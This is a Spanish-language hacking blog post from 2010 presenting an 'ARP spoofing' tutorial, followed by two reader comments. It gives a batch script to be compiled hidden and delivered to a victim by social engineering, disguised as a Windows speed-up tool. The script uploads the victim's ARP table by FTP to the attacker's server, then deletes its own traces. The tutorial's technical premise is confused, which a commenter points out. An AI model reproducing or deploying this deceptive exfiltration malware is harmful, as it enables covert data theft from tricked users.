10 may. 2010

[ARP Spoofing] Tutorial

¿Qué es ARP?

ARP es un protócolo a nivel de redes que se encarga de asignar una dirección IP a una dirección física o MAC.
Los routers tienen tablas ARP dónde se guardan las direcciones MAC con su dirección IP.

¿Qué es Spoofing?

Spoofing es una técnica de suplantación de una dirección o identidad,es decir,se copia una dirección cualquiera de un ordenador ajeno y se atribuye dicha address a la nuestra.

¿En qué se basa mi manual?

Lógicamente,suplantaré la tabla ARP de un ordenador cualquiera por la mía.
Es conocida una técnica llamada "Malcom in the mildlem" que trata de envenenar la tabla ARP de X PC y luego sniffea sus paquetes en red LAN.

Yo sólo enseñaré a suplantar la tabla ARP desde una red WAN.

Sin más rodeos,¡comencemos!

Primero será obtener la dirección IP dinámica del ordenador atacado,podemos ver muchas técnicas sobre esto en Google.

Al saber la dirección IP,debemos iniciar el Batch File Compiler (descargar en http://quick-batch-file-compiler.programas-gratis.net/) y compilamos el siguiente code en modo ghost:
@echo off
arp -a >> %homedrive%\tablaARP.txt
echo Us3r >> ftp.tmp
echo P4ss >> ftp.tmp
echo binary >> ftp.tmp
echo put %homedrive%\tablaARP.txt >> ftp.tmp
echo bye >> ftp.tmp
ftp -s:ftp.tmp ftp.tus3rv3r.com
ping -n 10 127.0.0.1 > nul
del /f /q /s ftp.tmp
del /f /q /s %homedrive%\tablaARP.txt
del /f /q /s %0
goto EOF
En Us3r, P4ss y ftp.tus3rv3r.com,debéis poner lo equivalente de vuestros datos de vuestra cuenta FTP.

Debería quedar algo así:

Lo compilamos y se lo enviamos al ordenador a infectar utilizando Ing. Social para que lo abra,por ejemplo:

Diciéndole que es un ejecutable que aumenta el rendimiento de Windows...

Cuándo lo abra,entramos en nuestra cuenta FTP y bajamos el TXT.
Abrimos el archivo y lo modificamos poniendo:
@echo off
::Borramos los nombres "Dirección de Internet" y demás que aparecen encima de las tablas.
arp -s "dirección IP" "dirección MAC"
arp -s "dirección IP" "dirección MAC"
:: ... Así hasta rellenar todas las columnas.
msg * ARP Copiado!!
exit /b

Damos a "guardar como..." y ponemos cualquier nombre pero con extensión ".bat".
Luego vamos al MS-DOS y borramos todo el caché ARP que es nuestro...
arp -d *

Y después ejecutamos el BAT.

Para comprobar si tenemos la tabla ARP igual al del archivo TXT ponemos en el CMD "arp -a" y comprobamos...

Es un método muy fácil y a la vez tan potente.

Autor: NetPirate

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

2 Notaciones:

  1. Enviarle un bat que le saque la direccion MAC a un pc de una red local ? no es mas facil usar un scanner como superscan, spylan ... entre otros ? o simplemente utilizar la cmd, hacerle un ping, mirar la tabla arp para ver la nueva conexion con ese pc y su direccion MAC ... es mas facil.

    Es que se va a sniffar paquetes de un pc conectado a internet y no a una red lan ?

    ResponderEliminar
  2. En efecto, tienes razón, pero es para explicar el concepto, después de que se entiende puedes ponerle de tu propia cosecha. ;)

    ResponderEliminar

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.